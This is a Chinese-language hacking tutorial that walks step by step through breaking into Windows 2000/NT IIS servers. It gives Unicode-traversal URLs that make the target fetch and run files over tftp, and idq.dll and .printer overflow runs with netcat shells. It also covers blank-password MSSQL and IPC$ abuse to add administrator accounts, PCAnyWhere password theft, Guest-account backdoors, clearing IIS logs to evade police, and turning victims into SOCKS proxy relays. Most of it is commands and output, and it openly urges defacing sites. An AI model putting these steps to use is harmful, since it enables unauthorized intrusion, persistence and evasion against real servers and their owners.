| 关键词: nbsp xxx 主机 密码 telnet 目标 漏洞 流光 exe Microsoft |
实战演练阶段 1.Unicode漏洞实战篇(文中所提到的软件均可在黑白网www.521hacker.com下载到。) 还记得我们在第一部分介绍的Unicode漏洞吗?可别告诉你没有什么印象啊!呵呵,我们就先来看看利用Unicode漏洞和tftp来上传文件的方法。也许你会问,什么是tftp呢?简单来说,tftp 就是让你的电脑变成一台服务器,让目标主机来下载你的文件,这样就可以达到上传的目的。在运行tftp32.exe之前,建议关闭其他FTP服务器,保持tftpd运行,这时你的机器已经是一个FTP服务器了。然后,把你要上传的文件,复制到同一目录下。回到你的浏览器,在地址栏里输入: http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp -i y.y.y.y GET icmd.exe c:\\inetpub\\scripts\\icom.exe y.y.y.y为你自己的IP,注意:c:\\inetpub\\scripts\\icom.exe,用"\\"隔开。 其中c:\\inetpub\\scripts\\为主机服务器目录,要看主机的具体情况而定,icom.exe为被改名的icmd.exe(名字自己起吧)。然后等待...大概N分钟...IE浏览器左下角显示完成,红色漏斗消失,这时icmd.exe已经上传到主机c:\inetpub\scripts\目录了。您可以自己检查一下。执行icom.exe(icmd.exe),在地址栏输入: http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\icom.exe,如果有提示,那表示上传成功! 好的,下面我们再来谈谈用利用Unicode漏洞结合Winshell来取得SYSTEM权限的实例。假设目标主机存在Unicode漏洞。还是用tftp来上传winshell.exe,并将其改名成winserver.exe(这样比较隐蔽嘛!),然后在浏览器里输入: http://xxx.xxx.xxx.xxx/scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\winserver.exe (这时候,浏览器可能像没有响应一样,许久没有反应,但是,这个程序已经启动了,请暂时不要关闭浏览器) 好的,现在我们就可以telnet上去了:telnet xxx.xxx.xxx.xxx 5277 (5277是winshell默认打开的端口) WinShell v1.0 - '!' to quit, 'enter' to shell... Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\Inetpub\scripts> 在黑别人主页的时候是不是遇到过找不到WEB文件存放位置的情况?有时候网管为了避免受到攻击,就把WEB文件的存放位置改了。这可苦了我们啊,没关系,只要是它的2K或NT没有打service park(补丁包,简称SP),那么它就存在一个ida漏洞,攻击者利用此漏洞可以得到WEB文件存放的位置。我们在浏览器里输入一个不存在的.ida文件,如:http://xxx.xxx.xxx.xxx/Nature.ida,接着,浏览器就会返回如下的提示: 找不到IDA文件在 D:\Inetpub\wwwroot\Nature.ida 其中,“D:\Inetpub\wwwroot\”就是目标主机存放WEB文件的地方了。呵呵,黑了它吧! 攻击完成之后,我们就要擦PP了,要不被警察叔叔拉去玩,可就不好了,对吧? 用tftp把CleanIISLog.exe传到目标主机上去,再利用winshell telnet 上去,在命令行下执行CleanIISLog.exe就可以了(有关CleanIISLog的用法,请参见程序附带的帮助文档)。PP擦完后走人! 2.idq.dll漏洞实战篇 这次是利用idq.dll漏洞溢出SYSTEM权限。要用到的程序有:Snake IIS IDQ 溢出程序、Netcat(即NC),有关软件的使用方法,详见帮助文档,笔者在此就不都介绍了。 假设我们的目标主机是2K,有无打SP不清楚。我们以GUI(图形界面)版的Snake IIS IDQ 溢出程序为例介绍。 设置:被攻击地址:IP:xxx.xxx.xxx.xxx Port(端口):80 溢出选项:选择“溢出后,在一个端口监听” 监听端口:813 要绑定的命令:cmd.exe /c dir c:\ 操作系统类型:IIS5 Chinese Win2k 设置完成之后,点击“IDQ溢出”,完成。程序会提示“发送shellcode 到 xxx.xxx.xxx.xxx :80 OK”。 接着进入MS-DOS方式。以下面的方式运行NC:nc --v xxx.xxx.xxx.xxx 80 C:\>nc -vv xxx.xxx.xxx.xxx 813 xxx.xxx.xxx.xxx: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [xxx.xxx.xxx.xxx] 813 (?): connection refused sent 0, rcvd 0: NOTSOCK D:\> 呵呵,没有成功哦,可能是打了SP1吧,那我们就在“操作系统类型”里选“IIS5 Chinaese Win2K SP1”,重复以上步骤。 C:\>nc -vv xxx.xxx.xxx.xxx 813 xxx.xxx.xxx.xxx: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [xxx.xxx.xxx.xxx] 813 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> 3.IIS.printer漏洞实战篇(用到的程序有:IIS5hack(.printer溢出工具), Netcat(即NC) 。有关IIS5HACK的用法参见帮助。) 关于IIS5HACK程序中部分单词解释:Host:溢出主机的IP地址。HostPort:主机端口。HostType:主机操作系统类型。ShellPort:溢出的端口 现在我们开始吧。假设目标主机为2K系统,且存在IIS.printer漏洞。示例如下: C:\>iis5hack xxx.xxx.xxx.xxx 80 1 3739 IIS5 remote .printer overflow. writen by sunx http://www.sunx.org for test only, dont used to hack, :p Listn: 80 connecting... sending... Now you can telnet to 3739 port good luck :) OK!溢出成功!接着用NC连接它的3739端口: C:\>nc xxx.xxx.xxx.xxx 3739 http://www.sunx.org Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32> c:\WINNT\system32>whoami SYSTEM 3.MSSQL空密码漏洞实战篇(用到的软件:流光FluxayIV) a.利用SQL空密码添加超级用户 开始吧!运行流光4,按Ctrl+R,出现主机扫描设置,填入IP地址,扫描主机类型选SQL,点确定。一会后,假设我们扫到了一台SQL密码为空的主机,流光会自动将用户加入列表,点击用户名,流光会出现连接的提示,点击即可连接。现在你可以添加一个用户(SYSTEM权限): net user Nature 123456 /add net localgroup administrators Nature /add b.SQL空密码结合PCAnyWhere获得目标主机的完全管理权 检查一下目标主机是否开有5631端口,如果有的话,说明目标主机有PCAnyWhere远程管理,如果取得他的帐号和密码,我们不就是可以用PcAnyWhere来远程管理目标主机了吗?!默认情况下,PCAnyWhere安装于c:\Program Files目录下,其data目录下的.cif文件中保存着加密过的帐号和密码。只要得到此文件,就可以用流光自带的PCAnyWhere密码文件解码器来快速解出密码了!用流光扫描该主机,如果有PCAnyWhere文件,那么在流光主机详细列表中就会有主机名了。点击该主机后,流光会有连接提示,点击后即可出现连接对话框。在其中填上你的WEB服务器(可以是免费空间)的ftp地址,用户名和密码,点击确定,过一会,流光会提示上传成功。我们再从我们的个人主页上将那个.cif文件下载下来。然后在流光中按Ctrl+T调出文件选择框,选中那个.cif文件,单击确定,流光的PCAnyWhere密码文件解码器就会很快解出密码!现在打开PCAnyWhere Manager,建立一个指向xxx.xxx.xxx.xxx的通道。在setting项中选择network host pc to control or ip adress, 并添上目标ip:xxx.xxx.xxx.xxx ,选中login information项中的automatically login to host up connection ,并在下面的login name和password栏中填入刚才得到的用户名和密码,确定即可。双击新建立的通道,稍等片刻即可看到了对方桌面。呵呵!又搞定咯!抓抓里面的好东东吧! 4.IPC$共享弱密码漏洞篇(用到的软件:流光FluxayIV,srv.exe、ntlm.exe流光的tools目录下有) IPC$是Windows的默认共享。我们可以用主机的管理员用户名和密码连接。其实,这个共享并没有什么漏洞。问题就出在管理员密码上了。直至现在为止,世界上起码有20%的人,把主机密码设置为“空”或者“123”等简单密码。而这就是个致命的共享漏洞。我们可以通过猜解管理员的密码,得到目标主机的超级管理员权限, 就可以将目标主机完全控制了!呵呵!是不是很惊讶?来吧,开始入侵!Go Go Go !!! 如果你得到了SQL的管理员密码,你就可以通过IPC$连接到目标主机了。在命令提示符下,使用如下命令: C:\>net use \\xxx.xxx.xxx.xxx\IPC$ "" /user:"administrator" 命令成功完成。 C:\>copy srv.exe \\xxx.xxx.xxx.xxx\admin$ 已复制1个文件。 C:\>net time \\xxx.xxx.xxx.xxx \\xxx.xxx.xxx.xxx 的当前时间是 2002/2/11 上午 9:30 命令成功完成。 C:\>at \\xxx.xxx.xxx.xxx 9:35 srv.exe 新加了一项作业,其作业 ID = 1 过了几分钟后,可以再查查目标主机的时间到了我们设置的时间了没有,如果到了,我们就可以telnet上去了,默认端口是99 C:\>telnet xxx.xxx.xxx.xxx 99 Microsoft Windows 2000 [5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32 C:\>copy ntlm.exe \\xxx.xxx.xxx.xxx\admin$ 回到刚才开的telnet的窗口 Microsoft Windows 2000 [5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32\ntlm.exe Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. Done! C:\WINNT\system32\net start telnet Telnet 服务正在启动... Telnet 服务已经启动。 键入exit,切断和目标主机的telnet连接,然后再次telnet到目标主机: C:\WINNT\system32\telnet xxx.xxx.xxx.xxx login:administrator Password: 其实在这样登陆后,为了以后我们还可以重复利用这台主机,我们应当学会给自己留条后路,那就是留后门啦: C:\>WINNT\system32\copy srv.exe c:\inetpub\scripts C:\>WINNT\system32\cmd.exe c:\inetpub\scripts\winserver.exe C:\>net user Guest /active:yes C:\net user Guest 1234567890 C:\>net localgroup administrators Guest /add 好了,后门也留够了,这下可以放心了。下次如果管理员的密码改了,只要Guest没有修改,你就可以用Guest来登陆目标主机了! 5.Sock5代理跳板篇(用到的程序:sksockserver.exe,由Snake制作的sock5代理跳板制作工具) 经常有朋友会问起关于Sock5代理的问题,可见大家都对它很感兴趣,所以我觉得还是有必要在这里介绍一下(Sock5代理真的很有用哦) 代理跳板的原理,可以参见以下的示意图: 加密数据 加密数据 普通数据 []=======[]=======[]=======[]========[]=:::=[]=======[] 工作站 跳板1 跳板2 跳板3 跳板4 跳板N 目标机 好的,开始制作Sock5代理跳板咯!先用IPC$登陆到目标主机上,方法见上文IPC$共享弱密码漏洞篇。然后进入命令提示符状态: C:\>copy c:\snake\Sksockserver.exe \\xxx.xxx.xxx.xxx\c$\admin$ C:\>telnet xxx.xxx.xxx.xxx Microsoft (R) Windows 2000 (TM) Version 5.00 (Build 2195) Welcome to Microsoft Telnet Client Telnet Client Build 5.00.99203.1 Escape Character is 'CTRL+]' You are about to send your password information to a remote computer in Internet zone. This might not be safe. Do you want to send it anyway(y/n):y NTLM Authentication failed due to insufficient credentials. Please login with clear text username and password Microsoft (R) Windows (TM) Version 5.00 (Build 2195) Welcome to Microsoft Telnet Service Telnet Server Build 5.00.99201.1 login:administrator password: ********** *========================================================== Microsoft Telnet *========================================================== C:\> C:\>sksockserver.exe SkServer - is freeware, All Rights Reserved by snake.2001. Run with paramater below list: -Install (Install the service) -Remove (Remove the service) -Debug 1813 (Run as console program at port 1813) ~ Next are about service registry value setting ~ -config Show [Port/StartType/Client/SkServer] (Show current config) -config Port [NewPort] (Set/Show SkServer's Port) -config StartType [1~3] (Set/Show StartType) ( 2-Auto, 3-Manual, 4-Disable) -config Client [add/del/change] [IP Mask Enable] (Show/add/del/change Client Set) -config SkServer [add/del/change] [IP Port Enable] (Show/add/del/change Pass Skserver Set) C:\>sksockserver -install 如果你想来个连跳,那么安装后还要做一下设置。先看看默认设置情况: C:\>sksockserver -config show SkServer Port = 1080 SkServer StartType: 3 - Manual SkServer Enable Client Set Num:0 SkServer Pass SkServer Number:0 如何设置连跳: c:> SkSockServer -config client'ip [add/del] === [显示/增加/删除 客户端的项目] c:> SkSockServer -config SkServer'ip [add/del] === [显示/增加/删除 经过SkServer的项目] C:\>net start skserver C:\>net start These Windows 2000 services are started: Snake SockProxy Service Telnet ...... The command completed successfully. C:\> |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|